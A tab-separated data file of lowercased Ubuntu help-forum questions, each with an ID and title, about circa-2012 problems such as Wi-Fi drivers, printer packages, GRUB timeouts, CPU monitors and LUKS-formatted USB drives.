235180	screenlets ringsensors has to many cpu sensors , what are they ?	i just installed screenlets to get some onscreen information about my system . i 'm trying the ringsensors screenlet to monitor cpu load , but there are more sensors available to monitor than i 'd expect . when i go to the settings to select which cpu ( core ) the ring should monitor i get 5 different cpus to choose from : my processor is a quadcore so i 'd expect 4 cpu monitors , not 5 . if i check /proc/cpuinfo i get the expected count : $ cat /proc/cpuinfo | grep ^processor processor : 0 processor : 1 processor : 2 processor : 3 all the monitors get some kind of reading since they present a ever updating value : both htop and ringsensors have some update interval , so even though i had both meters on the screen simultaneously when i did the screencap i 'm not surprised that htop and ringsensors get different values . can someone explain the extra cpu meter to me ? is one of the meters the average load of all the cores or something ? is there some way i can try to max out one core at a time to see how that affects the reported load values ? edit : using the command taskset combined with the command stress i was able to stress one core at a time and from that i could derive that cpu1-4 represent the individual cores , and cpu0 is something else , the aggregation of half of the cores or something . $ stress -c 1 & [ 1 ] 18829 $ taskset -p -c 0 18830 pid 18830 's current affinity list : 0-3 pid 18830 's new affinity list : 0 $ taskset -p -c 1 18830 pid 18830 's current affinity list : 0 pid 18830 's new affinity list : 1 $ taskset -p -c 2 18830 pid 18830 's current affinity list : 1 pid 18830 's new affinity list : 2 $ taskset -p -c 3 18830 pid 18830 's current affinity list : 2 pid 18830 's new affinity list : 3 as you can see stress spawned a child process , that 's why i must set the affinity of the pid 18830 instead of 18829 . lastly , if i max out two ( or more ) cores simultaneously i get cpu0 to max out aswell :
235183	on typing dev/usb/lp0 it says 'no such file or directory '	i am trying to use escputil to determine ink level.on typing dev/usb/lp0 it says 'no such file or directory ' .
235190	what is `` win '' key used for in linux ?	hello i have a windows pc but i installed ubuntu 12.10 on it . i have the win key which displays the start menu in windows , but in ubuntu i think it 's useless , can it be used for something interesting ?
235192	installing system updates breaks my atheros ar9285 wifi adapter . how do i fix this ?	i have an acer aspire one d257 notebook i installed ubuntu 12.10 on . everything worked until i allowed the automatic updates to be installed . it appears that applying the updates breaks the wireless network adapter on this machine . it reports `` network device not managed '' . the regular ubuntu flavour was too slow anyway , so i tried lubuntu 12.10 ( live ) and discovered it was really faster than ubuntu . i then decided to install it with automatic updates and after the first reboot the wi-fi network did not work anymore , similar to my attempt with ubuntu . any idea on how to fix this ? i 'd like to be able to keep my system up to date . a newbie of linux here the relevant output of lspci -nn is : 02:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 )
235197	german truck simulator on ubuntu ?	i want to know if is there any way to play german truck simulator in ubuntu 12.04 ? with wine , it does n't works . ( the installation worked fine , but when i launch gts , it says me this : german truck simulator unable to find any graphic card driver on your system . please install the correct driver to your graphic card and try start the game again . if i try to install the windows drivers , it says me this : there is no graphic card on your pc which is comptible with this driver . please install the correct drivers and start the installer again . so , is there a linux version of gts ? ( or a .deb package ? )
235200	ubuntu 12.10 : error installing canon ufr2 drivers	i tried to install the drivers for my canon mf4150 that i successfully used under my previous 10.04 instance . but when i run the command to install .deb packages , it gives me an error complaining that a ghostscript package is missing . of course trying to apt-get install that package has , it says that there 's no installation candidate : root @ u1210 : /dati/download/drivers/canon # dpkg -i *.deb selecting previously unselected package cndrvcups-common . ( reading database ... 271641 files and directories currently installed . ) unpacking cndrvcups-common ( from cndrvcups-common_2.20-1_i386.deb ) ... selecting previously unselected package cndrvcups-ufr2-uk . unpacking cndrvcups-ufr2-uk ( from cndrvcups-ufr2-uk_2.20-1_i386.deb ) ... dpkg : dependency problems prevent configuration of cndrvcups-common : cndrvcups-common depends on gs-esp ; however : package gs-esp is not installed . dpkg : error processing cndrvcups-common ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cndrvcups-ufr2-uk : cndrvcups-ufr2-uk depends on cndrvcups-common ( > = 2.20 ) ; however : package cndrvcups-common is not configured yet . dpkg : error processing cndrvcups-ufr2-uk ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : cndrvcups-common cndrvcups-ufr2-uk root @ u1210 : /dati/download/drivers/canon # sudo apt-get install gs-esp reading package lists ... done building dependency tree reading state information ... done package gs-esp is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gs-esp ' has no installation candidate how can i fix this , or use a workaround to use this drivers ? ? please give me some hints.. thanks a lot . enrico
235201	usb flash synchronization with ubuntu-one	i want to synchronize my usb flash drive with the ubuntu-one cloud . that is : connect the usb flash disk and automatically have the synchronization started .
235205	how do i share the internet connection of my pc with my android/cyanogenmod phone ?	i 'd like to use my laptop 's internet connection with my mobile . i 've googled a lot and among other things followed this procedure . but , even after my phone is rooted and all , i still can not see the ad-hoc network that i create on my laptop using ubuntu . now , further googling showed that i need to change the wpa_supplicant file in system/bin so that my wifi-direct will detect ad-hoc network created by my laptop . unfortunately , i 've tried to find the file ( with the correct settings ) , have tried a few other things as well , but to no avail . i was thinking maybe i 'm doing something wrong or going about it the wrong way . any help in the matter will be appreciated .
235207	max resolution available is 1024x768 , while i should expect 1280x1024	the max resolution what i can choose is 1024x768 . what shall i do to have 1280x1024 ( max resolution of my monitor ) option too ? my configuration : a siemens brand pc ubuntu 11.10 oneiric ocelot samsung syncmater 913n tft monitor via analog ( d-sub ) connection graphics card is reported to be ( lspci ) : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82865g integrated graphics controller [ 8086:2572 ] ( rev 02 ) and lshw : *-display description : vga compatible controller product : 82865g integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : f0000000-f7ffffff memory : e0000000-e007ffff ioport:1000 ( size=8 )
235208	hiding terminal output when chaining commands	from the terminal , i like launching my standard working applications ... gedit with my todo-list , firefox and chromium . to save time , i ( 1 ) chain this command into one line , ( 2 ) silence all error messages from stderr and stdout with 2 & > 1 > /dev/null and ( 3 ) background the processes with & to regain a clean terminal : gedit ~/desktop/todo.txt 2 & > 1 > /dev/null & firefox 2 & > 1 > /dev/null & chromium-browser 2 & > 1 > /dev/null & it seems to work fine except for one small detail . gedit opens the todo file as well as a new textfile with the name 2 . are the pipes misplaced ?
235209	can not install gcc booted from a live usb	i tried to install gcc and other packages on ubuntu booted from a live usb stick . all i see is the following error ubuntu @ ubuntu : ~ $ apt-get install gcc e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i think this might be because i have not installed ubuntu on my system , its just booted from a usb stick . if that is really the problem here then could someone please give me a solution to install packages in such a scenario . i can not install ubuntu on my system as i dont have any free partition and i can not delete the existing ones as i do n't have an external storage device to back up my data . thank you .
235212	what are these unknown unauthorised network connections ?	as soon as i start the computer it connects to a lot of different connections over internet , even when i have n't opened the browser . the screenshot from etherape is attached for better understanding my internet connction has slowed down in the last few days so i checked and found these connections i am using ubuntu 12.04 . does it mean my ubuntu installation is affected by some malware / virus or is it ok to have such connections ? does it affect my internet connection speed ?
235216	qinheng ch345 usb midi device not showing up in lsusb	i have a usb midi cable which shows up on connect in the kernel messages as : usb 1-1.2 : new full-speed usb device number 12 using dwc_otg yet , somehow in lsusb this device does not show up : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 0424:9512 standard microsystems corp . bus 001 device 003 : id 0424 : ec00 standard microsystems corp. pmidi -l also only results in this : port client name port name 14:0 midi through midi through port-0 i 've tried a powered usb hub since this is connected to a raspberry pi , but it made no difference . the device shows up correctly on a mac computer , though . it is the following model : usb_id ( 0x1a86 , 0x752d ) : /* qinheng ch345 `` usb2.0-midi '' */ i am not sure how to further debug this problem . are there any feasible ways to see what is going on ( with alsa maybe ? ) when connecting the interface ? update i did n't realise that this raspberry pi is running debian , not ubuntu , so this might be off-topic here . still , i would appreciate if someone has a general approach to dealing with this kind of problem . update /var/log/syslog is more specific . on disconnecting the device ( and reconnecting ) i get this sequence of messages : jan 2 14:32:09 raspberrypi kernel : [ 657.661712 ] usb 1-1.2.3 : new full-speed usb device number 5 using dwc_otg jan 2 14:32:09 raspberrypi kernel : [ 657.741724 ] usb 1-1.2.3 : device descriptor read/64 , error -32 jan 2 14:32:09 raspberrypi kernel : [ 657.931743 ] usb 1-1.2.3 : device descriptor read/64 , error -32 jan 2 14:32:09 raspberrypi kernel : [ 658.121670 ] usb 1-1.2.3 : new full-speed usb device number 6 using dwc_otg jan 2 14:32:09 raspberrypi kernel : [ 658.201652 ] usb 1-1.2.3 : device descriptor read/64 , error -32 jan 2 14:32:09 raspberrypi kernel : [ 658.391681 ] usb 1-1.2.3 : device descriptor read/64 , error -32 jan 2 14:32:10 raspberrypi kernel : [ 658.581705 ] usb 1-1.2.3 : new full-speed usb device number 7 using dwc_otg jan 2 14:32:10 raspberrypi kernel : [ 659.001374 ] usb 1-1.2.3 : device not accepting address 7 , error -32 jan 2 14:32:10 raspberrypi kernel : [ 659.081777 ] usb 1-1.2.3 : new full-speed usb device number 8 using dwc_otg jan 2 14:32:10 raspberrypi kernel : [ 659.501382 ] usb 1-1.2.3 : device not accepting address 8 , error -32 jan 2 14:32:10 raspberrypi kernel : [ 659.501806 ] hub 1-1.2:1.0 : unable to enumerate usb device on port 3 this was on a powered usb hub . same result when connecting directly .
235217	how do i fix a `` previous installation has n't been completed . '' error in software center ?	ubuntu software center crashes whenever i try to install something . it shows the following error : previous installation has n't been completed . the installation could have failed because of an error in the corresponding software package or it was cancelled in an unfriendly way . you have to repair this before you can install or remove any further software . how do i fix this ?
235218	how to deal with windows 8 boot partition ?	i want to dual boot ubuntu with windows 8 enterprise . i have a 160 gb hard disk drive and completely wiped out all the existing partitions of this drive to create 3 new partitions in the following order : 30 gb ( for ubuntu ) 35 gb ( for windows ) 84 gb ( balance for other documents ) next , i installed windows 8 on the 2nd partition of the drive ; ie ; the one with 35 gb . then , i booted ubuntu 12.10 off my usb drive to install it on the 1st partition of the drive ; ie ; the one with 30 gb . when it asks for installation type , i select something else and press continue . the following screen shows the partitions on my hard disk . however , i notice that windows is also utilizing a bit of space in the first partition on which i want to install ubuntu . and probably windows boot manager files also reside in this partition . following is the snapshot from windows disk management . so , my fear is that if i install ubuntu on the 1st partition , then i would lose the ability to boot into windows . please help me with what are the options available for me and how i should go about installing ubuntu in order to make dual-boot a success . will installing ubuntu on this 1st partition and then running bootrec /fixmbr from windows recovery command prompt fix the problem ? or , shrinking this 1st partition is the best solution ? if so - what size should it be ? or , something else all together . or , all my fears are baseless and i should just go on with the installation ?
235219	all browsers crashing on ubuntu 12.04	this is a fresh install of ubuntu 12.04 , all browsers crash , especially when using google mail or google drive / docs . i am using google chrome version 23.0.1271.97 and chromium version 23.0.1271.64 ubuntu 12.04 ( 165188 ) . firefox quits on crashing whereas the chromium based browsers individual tabs crash . the problem also exists with opera . i have tried creating a new profile . when running chrome from the command line i get this error on tab crash : third_party/tcmalloc/chromium/src/free_list.cc:133 ] memory corruption detected . as well as [ 22322:22322:0102/125148 : error : layout.cc ( 160 ) ] not implemented reached in ui : :scalefactor ui : :getscalefactorfornativeview ( gtkwidget* ) and also alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream i have also tried clearing the cache , uninstalling , purging , reinstalling and still this problem persists . i have tried different versions of google chrome and still this problem persists . what should i try next / what output should i include to help in finding the problem ?
235222	wireless is not working on toshiba c - 850 13g	first of all , i have to say that i am a new user of ubuntu and i am not familiar with it at all ... after installing ubuntu 12.10 it would not recognise the wireless networks available ... how do i fix this ? after trying the wireless troubleshooting the results are : the device is on ! the output of the terminal lshw -c network is : *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory:92400000-92403fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 4c:72 : b9:83:7b:1e size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.10.17 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory:90004000-90004fff memory:90000000-90003fff i tried with no success to find the windows driver , so i can not use the windows wireless drivers . the output of the terminal iwconfig is : eth0 no wireless extensions . lo no wireless extensions . the output of ifconfig is : eth0 link encap : ethernet hwaddr 4c:72 : b9:83:7b:1e inet addr:192.168.10.17 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :4e72 : b9ff : fe83:7b1e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2705 errors:0 dropped:0 overruns:0 frame:0 tx packets:2253 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2479055 ( 2.4 mb ) tx bytes:257036 ( 257.0 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:548 errors:0 dropped:0 overruns:0 frame:0 tx packets:548 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49814 ( 49.8 kb ) tx bytes:49814 ( 49.8 kb ) the output of the terminal ping -c3 85.190.27.2 is : ping 85.190.27.2 ( 85.190.27.2 ) 56 ( 84 ) bytes of data . -- - 85.190.27.2 ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2014ms the output of the terminal ping www.ubuntu.com is : 64 bytes from avocado.canonical.com ( 91.189.90.40 ) : icmp_req=1 ttl=50 time=112 ms a thousand times no output with the terminal gksudo gedit /etc/modprobe.d/aliases ! ! i must be doing something ... .
235224	why is unity named unity ?	something similar to this question . why is unity named unity ? what 's the idea behind the name ?
235232	how to resize unity launcher icons ?	ubuntu 12.04 . i want to resize the icons in the launcher . as shown in this picture there is a resize tab and a restore defaults button : but i do n't have it . it 's the same but without the 'restore defaults ' and the 'launcher icon size ' . how do i enable those buttons or if i ca n't , how do i change the size of the icons ?
235236	why does my gedit `` open '' pulldown not show any recent documents ?	gedit used to show recent documents in an `` open '' pulldown , but that list has been empty recently . it has been this way for a while now ( by while , i mean weeks ) and i ca n't pinpoint any one change that preceded the problem . where did my list of files i recently edited in gedit go ?
235253	how to enable the blender console ?	i have installed blender 2.65a from its official site but am unable to activate the console for python . i 'm unable to run in terminal since it is not installed from ubuntu software center because it is five versions lagging in the repo . however , i tried to drag the executable blender file to the terminal , blender opened but without the console .
235254	electric vlsi 9.03 : java3d view problem	i have installed electric vlsi 8.10 software from the ubuntu software center and it works perfect . it shows 3d view of ic layouts . now i want to use its updated version electric 9.03 . it 's available here ( including electric free software extras ) . it works , too . but unfortunetly , now 3d view does n't show up . i have been trying it for a month or so but to no avail . i will really appreciate your help . i am using ubuntu 12.04. java -version outputs : java version `` 1.7.0_10 '' java ( tm ) se runtime environment ( build 1.7.0_10-b18 ) java hotspot ( tm ) server vm ( build 23.6-b04 , mixed mode ) here are a couple of screenshots illustrating the problem : 3d view menu items , visible in electric 8.10 : no 3d view menu items in electric 9.03 : ( thumbnails and expandable full-size images available here . )
235255	google chrome is installed but ubuntu software centre says it 's not	ubuntu 12.04 . when i was on ubuntu 11.10 and 11.04 , google chrome was available to download from the software centre . now i 'm on 12.04 and the software centre is saying chrome is not downloaded and it is not available to download . why does n't it say that it is downloaded ? thanks in advance .
235256	how can i install bluetooth drivers on a lenovo g470 ?	i 'm having problems with my bluetooth . i have 12.10 installed in my lenovo g470 . i have already tried installing blueman & additional drivers , but it is still not working . below is the sudo rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no
235258	installing kubuntu on pc without internet connection	i need to install kubuntu lts version on x86 notebook . current version is numbered 12.04.1 . unfortunately my internet connection is somewhat limited so i can download max . 1 gb per month . now what are my options ? i checked this web page : http : //releases.ubuntu.com/precise/ on the bottom of the page is directory listing . most iso images have size ~700 mb . i can download it at work or at friend , its no problem . but i am not sure if this small image contains all binaries needed to create usable system ( at least in minimalistic version including graphical user interface , openoffice , firefox browser and media player ) ? is there somewhere more swelled version of setup program ( lets say on 2 - 3 dvds ) containing selection of frequently used packages ?
235261	making windows files inaccessible from ubuntu	i 've installed ubuntu on a pc with windows 7 . now since i want to make that pc a vpn server under ubuntu i 've made the login require no password ( windows still has a password ) . this makes it easy for anyone to see my windows files . can i make them inaccessible ( and not visible ) from ubuntu . sort of like making ubuntu and windows two separate systems with their own files on the same hard drive . thank you ! : )
235265	netgear a6200 usb modem does not work on ubuntu 12.10	my netgear a6200 usb modem does not work with ubuntu 12.10 running on either a i7 ( 2.4 mhz w/8gb ram , two 500gb hds & eight usb 2.0 ports ) desktop or a hp/compaq mini 110c netbook ( running 12.04 ) . the a6200 modem is simply not recognized . several older netgear modems work with ubuntu 12-10 fine . i tried a6200 on wine and on a virtual windows disk , but that was no help . the a6200 does work fine on windows vista and windows 8 computers . any chance that there is a usable driver out there for this modem ? or any other way to get it to work with ubuntu 12.10 ?
235266	what games like age of empires and rise of nations can i play on ubuntu ?	i used to play age of empires 2 age of empires 3 rise of nations in windows 7 . but i find none of them work for me , and i could n't find any alternatives in the software center . are there any good alternatives for ubuntu ?
235267	open source ati driver and hdmi support	( note : this question may also concern every owner of a brand new ati legacy card ! ) i have an ati mobility radeon hd 3670 on my laptop and i installed ubuntu 12.10 a few months ago . since then , i 've been looking for some way to make the hdmi work , as the proprietary drivers do not work with the new xorg . recently , i came across this post from 2007 . am i missing something ? is it possible to make the hdmi sound port work with the open source ati driver ? is there some work around without having to install some obscure kernel or unsupported ppa ? when i execute the lspci command , i do get the lines 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv635 [ mobility radeon hd 3670 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv635 hdmi audio [ radeon hd 3600 series ] which tells me that it can be used to send audio through it , but it does not appear in my sound settings . ** note ** : it seems that redhat ( bug 428964 ) has a patch that works with some ati cards ( including mine ) , why has n't this ended up in the ubuntu release ? ( or if it did , why does n't it work anymore ? ) ** note 2 ** : even arch linux has some documentation to install hdmi support with the open source ati drivers ! supplement the hdmi cable is plugged in , i even rebooted the computer and tried under serval conditions , the following information are constant : the command aplay -l returns **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 and finally aplay -d plughw:1,3 /usr/share/sounds/alsa/front_center.wav ... just does nothing . also , this looked quite promising , but i hesitate to install pulseaudio . another forum discussion that looks interesting , but i lack some understanding on this one right now .
235270	python libgtop bindings for ubuntu 12.10 ?	in-place upgraded from 12.04 to 12.10 , and python import gtop stopped working . python-gtop 2.32.0+dfsg-1 ( amd64 binary ) in ubuntu quantal says superseded installing python-gnomedesktop and python-gnome2-desktop-dev did not help . where are the python libgtop bindings for ubuntu quantal ?
235274	can i auto-start music player after connecting headphones ?	is there a way to start my default music player after connecting the headphones or earphones ? if there is nothing in the form of a gui , i do n't mind writing a script for it , but i need some starting guidance , which is where do i write the script ? i am connecting the headphones through the 3.5mm jack .
235278	how can i stop unattended-upgrades from rebooting the machine ?	i just had a look at my amazon ec2 instance and noticed i had 20 minutes exactly of downtime . i did n't know what caused it so i logged in to ssh and tried upgrading my packages , and saw that the unattended-upgrades package needed upgrading . i went ahead and did this . after searching it seems like this package can automatically reboot your machine . not sure why i did n't get to configure this as it came with the os , but oh well . does anyone know how to prevent the package from automatically rebooting ? or how to stop it updating packages altogether ? i can do that myself .
235279	my wifi adapter is not working at all , how to troubleshoot ?	on this site i see hundreds if not a thousand questions being asked about issues with a wireless lan adapter not being detected/recognized by ubuntu . some mainstream adapters appear to be utterly broken in linux support , while others just require some simple steps to get it to work . the options to get it to work appear to be infinitely huge and i have no clue where to get started ! what is considered 'best practice ' ? what order of things to try is most efficient in terms of time , effort and imposes minimal risk to my ubuntu installation ? please help me save time and guide me what to do , step by step .
235288	how to run an executable from a mounted drive ?	i have created an eclipse workspace on a mounted partition of my hard drive . i am able to successfully build the hello world program but when i try to execute the runnable i get the following error message : error starting process . exec_tty error : can not run program '' /media/vineet/devdata1/vinexpmount/debug/vinexpemount '' : unknown reason exec_tty error : can not run program '' /media/vineet/devdata1/vinexpmount/debug/vinexpemount '' : unknown reason exec_tty error : can not run program '' /media/vineet/devdata1/vinexpmount/debug/vinexpemount '' : unknown reason please tell what shall i do ? i have checked the permissions for the executable which is -rw-r -- r -- which means that i have not got the permission to execute . but when i create a workspace in root partition , i get the execute permission by default . what shall i do to get the same behaviour here ?
235296	how to change owner and permissions of a folder in desktop	the problem is that the folder directory is /home/marek/desktop/tekkitserver/3.1.1 and root has all but 5 file ownership and permissions what are inside it . it all happened after i launched tekkit server .bat file trough terminal and when i opened folder with `` home folder '' i saw that freshly created files are in total root access . and none of the sudo nautilus commands worked , because the folder was unreachable for nautilus . i was able to see no child folder even whit ctrl+h and i have troubles with chown . my user name is marek parbo ( marek ) and i am an administrator . and i know that this question is recently asked , but i really did n't understood it at all . i have experience with sudo nautilus because root was so defensive that and freshly formatted sd card was only permissioned to root and i got rid of it whit sudo nautilus . however , this time i ca n't use it .
235297	when will the sdl 1.3 libraries be available ( implementing force feedback ) , or how do i compile them ?	i want to use sdl force feedback for my joystick and use it on dolphin-emu . i need the 1.3 sdl libraries and only 1.2 are available . i tried to build them , but with no luck . can anyone help ?
235302	another wifi problem with ubuntu 12	i have the driver showing as active and enabled but no wireless network detection in connections . i am new to linux but very computer friendly . i have installed b43-fwcutter and firmware-b43-lpphy-installer i have also entered sudo apt-get remove -- purge bcmwl-kernel-source and dmesg | grep b43 in the terminal . nothing has changed , the sta driver still appears , no new drivers appear and no wireless signals in connections . can someone please help me work out this kink in my system . thank you for your time .
235303	cloud backup with specific requirements	first of all , i 'm aware of threads like comparison of backup tools . with that in mind , i have a specific set of requirements for backup , and i was wondering which are the current options - the informations around are fragmented and confusing , especially considering that online drives are not backup solutions . my requirements are the following : be able to backup individual files ( ie . no dejadup , thanks ) cloud storage ( upload of an intermediate backup archive is not viable ) have a daemon running in the background , backing up at least at time intervals ( optionally , having a continuous backup ) no need to setup a server file versioning ability to handle large data sets ( number of files rather than space ) ability to backup drives that are not guaranteed to be mounted , without hassles optionally : restore from the backup structure of a given point in time . this is different from restoring from the current backup tree , with the option of choosing older versions . reporting price does n't matter . excluded solutions : jungledisk was perfect , until the moment it 's been discontinued . spideroak is really badly coded ; it has annoying bugs , and it hangs on large number of files . also , if a drive is not mounted when so starts , it wo n't be backed up . symform has a bug in the registration . since you ca n't contact support without registering , it 's completely useless .
235307	are python bindings for opencv 2.4.3 available ?	i have installed the libraries and files for opencv 2.4.3 . however , the software center lists just the python bindings for opencv2.3 . where do i get the python bindings for 2.4.3 ? how do i install it ? i have 12.04 64bit and i use python 3.2.3 .
235308	nvidia-xconfig not found	i have a computer that after installing ubuntu 12.10 , updating it and then trying to install any of the available versions of the nvidia drivers will not install the nvidia-xconfig file ( which comes with the nvidia-settings package ) . i have actually tried the 304 , 306 , 310 series and even installed the xorg edgers ppa for the 313 series . all of them with no luck . the nvidia-current package installs fine and configures itself fine as a module for the particular kernel ( i had previously install the headers package for this to work ) , but when i install the nvidia-settings package via the terminal i get a warning : update-alternatives : warning : forcing reinstallation of alternative /usr/lib/nvidia-settings/ld.so.conf because link group nvidia_settings_conf is broken if i do a purge and try to install it again , the warning is gone , but if i reinstall it the warning appears . apart from this warning , the nvidia driver is not detected and instead of going to nouveau , it jumps to vesa which gives me for an nvidia geforce 560 ti a resolution of 640x480 . so why is this not installing correctly and what does the warning mean ?
235310	how do i run a simple zenity script after disconnecting from wifi ?	i am running kubuntu 12.10 64bit . i am trying to get a bash script to execute when i am disconnected from the network . i created a file in the folder /etc/network/if-down.d/ called test which has a single line : zenity -- info -- text= '' network down ! '' i can execute this script without any issues ; typing /etc/network/if-down.d/test into my terminal causes a message box to pop up saying `` network down ! '' . when i disconnect from my wifi network via the network manager , nothing happens . unplugging my wifi usb dongle does not cause the message box to appear either . my only guess is that for what ever reason scripts in /etc/network/if-down.d/ are not being executed . adding # ! /bin/bash as the first line did n't work either . edit : 2013-01-02 i had some issues using gertvdijk 's answer ( old edits and comments getting mixed up ) which are now sorted out . running zenity with su and display=:0 solved my problem .
235317	what is ubuntu touch ( ubuntu for phones )	following up on canonical 's announcement , what is ubuntu for phones , where can i download a copy of the os to run on my phone ? and how do i know if it 's compatible with my phone ?
235318	how to setup my isp provided static ip	i purchased a static ip address from my isp i am running ubuntu server 12.04 x64 with webmin installed i want to point a purchased domain name ( and also a free .tk domain ) at my server . every time i type the name of my free .tk name , i get the login page for my router . if it is my settings in bind can someone tell me the correct way to setup bind ? if it needs to be set in ubuntu can someone help configure it correctly ?
235320	how can i reset my forgotten password in ubuntu 12.04 ?	i forgot my password to access my ubuntu 12.04 . how can i reset it ! ? ? please help !
235328	how do i install ubuntu for phones ?	i know they just announced it , but i 'm wondering if there 's any way to peak at the upcoming goodies right now . 13.04 alpha ? ppa ? source code ?
235329	ubuntu12.10 `` disks '' pendrive 64gb format luks+ext4	i just bought pendrive / flshdrive 64gb and need to archive on it file bigger than 10gb so i believe fat32 is not an good option since it can handle only 4gb file in size . next thing is that i though about formatting it with ext2 to avoid overwriting with journaling but when i open disks application to format pendrive i have only option of fat32 / ext4 and luks + ext4 , and that is another thing , i need some sort of protection so how safe it will be to use ext4 + luks , 1.how does it works is the encryption aes 256 ? 2.it will ask me the password any time i need access the files on pendrive ? 3.why it take space on my pendrive in the lost+found folder i make test on old 2gb flashdrive ext4 + luks and it `` eat '' about 130mb ? 4.what will happen if insert to anther linux computer ? 5.what if i put it into windows with ext drivers installed , will it works asking for password ? 6.will ext4 + luks not overuse `` wear '' my pendrive too fast ? 7.is n't fat32 support drive up to 32gb only ? then why it let me format 64gb flashdrive ? 8.files permissions are not useful for me so how to deal with it on ext4 , so that if i will use that pen drive on new or re installed system there will be no access problems ? thank you for an answer
235340	how do i automatically mute/unmute sound during a certain time period ( e.g . night ) ?	is there an app to mute the computer say 10pm to 7:30am ? ( on android devices i use : phone silencer app )
235343	upgrading from 12.04 to 12.10 broke display in my nx client	i performed an in-place upgrade from 12.04 to 12.10 by following the system update prompts . when i attempted to log in from an nx client ( no machine ) , my xfce session was missing fonts almost everywhere , and some of the windowing elements were either missing or drawn incompletely . it was like this with xfce and unity , but less so with kde . the only way i could get the nx client to display all of the text and draw the gui elements properly was to select the option disable the render extension in the nx client options . i tried reconfiguring the x server dpkg-reconfigure xorg , switching video drivers ( from open to nvidia ) , switching window managers , disabling font aliasing . . . . never got it to work again without disabling the render extension in the nx client . any idea what might have changed in the upgrade that would break my nx client settings ? looking to see if this is related : gtk unthemed and ugly over nx yes ! looks like the same problem : nomachine nx : text missing on all gtk interface ( unity and gnome classic ) found a decent ( so far ) workaround that involves downgrading libcairo2 : http : //ubuntuforums.org/showthread.php ? t=2081746 i guess that will have to suffice until there is a libcairo fix . btw , disabling the render extension via nx client config was n't working for me because the degradation in quality made illegible some of what text did appear .
235345	how to install linux mint-x gtk/window theme/icon theme on ubuntu ?	i have just tried to install mint-x on my ubuntu 12.10 os from different sources and unfortunately i got this : it works perfectly , but the gtk+ theme part fails to reproduce the same theme that linux mint is using . the window and icon themes work perfectly , but the gtk+ theme doesnt . any ideas why ? i have used this source to get the latest gtk+ theme for mint-x : http : //packages.linuxmint.com/pool/main/m/mint-x-theme/ solved : after i ran the update manager ... .that triggered some changes in the gtk and now it looks just fine .
235347	what is the best way to uninstall nginx	i 'm trying to add new module to nginx with naxsi , but i should reinstall nginx . what is the better way of removing nginx ?
235350	accidentally set grub_timeout=0 , can not boot into ubuntu now	i have a dual boot system of ubuntu 12.10 and windows 7 . stupidly , i set my default boot os to windows 7 using this method and set grub_timeout=0 . now when i boot , the ubuntu red/purple screen flashes on and off and proceeds with booting windows 7 , effectively locking me out of ubuntu . is there any way to : change the `` booter ? '' to windows 7 , which would not have the timeout . hold down a key to over-ride the timeout ? i 've already tried shift without success . this link is exactly the problem i 've been having , however i do n't completely understand the part about booting from a live cd .
235352	what glib do i need ?	i am running ubuntu 12.04 and i am trying to compile the cpabe toolkit , but first i have to compile libbswabe . however , when i try to build libbswabe-0.9 it gives me an error stating that glib.h can not be found . here is the relevant text from the config.log file : configure:4013 : checking for glib - version > = 2.0.0 configure:4145 : result : no configure:4173 : gcc -o conftest -o3 -wall -o3 -wall conftest.c -lcrypto > & 5 conftest.c:31:18 : fatal error : glib.h : no such file or directory compilation terminated . what is glib.h and how do i install it ? and i did successfully enter sudo apt-get install libglib2.0-dev into the command line .
